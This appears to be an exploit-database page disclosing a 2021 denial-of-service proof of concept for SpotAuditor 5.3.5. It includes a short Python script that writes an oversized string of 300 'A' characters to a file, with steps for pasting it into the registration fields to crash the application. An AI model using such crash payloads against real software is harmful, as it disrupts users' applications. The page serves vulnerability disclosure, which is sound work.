header-logo
Suggest Exploit
vendor:
SpotAuditor
by:
Sinem Şahin
7.5
CVSS
HIGH
Denial Of Service
400
CWE
Product Name: SpotAuditor
Affected Version From: 5.3.5
Affected Version To: 5.3.5
Patch Exists: NO
Related CWE: N/A
CPE: a:nsauditor:spotauditor
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64
2021

SpotAuditor 5.3.5 – ‘multiple’ Denial Of Service (PoC)

This exploit is for SpotAuditor 5.3.5. It is a Denial of Service vulnerability which can be triggered by copying a large amount of data into the 'Name' or 'Key' field when registering the software. This will cause the application to crash.

Mitigation:

The user should not paste large amounts of data into the 'Name' or 'Key' field when registering the software.
Source

Exploit-DB raw data:

# Exploit Title: SpotAuditor 5.3.5  - 'multiple' Denial Of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-10
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested on: Windows 7 x64
# Version: 5.3.5


# Steps: 
 1- Run the python script. (exploit.py)
 2- Open payload.txt and copy content to clipboard.
 3- Run 'SpotAuditor 5.3.5'.
 4- Register -> Enter Registration Code
 5- Paste clipboard into the "Name" or "Key".
 6- Click on OK.
 7- Crashed.

---> exploit.py <--

#!/usr/bin/env python
buffer = "\x41" * 300

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print"File okey!!"
except:
    print "File is not created."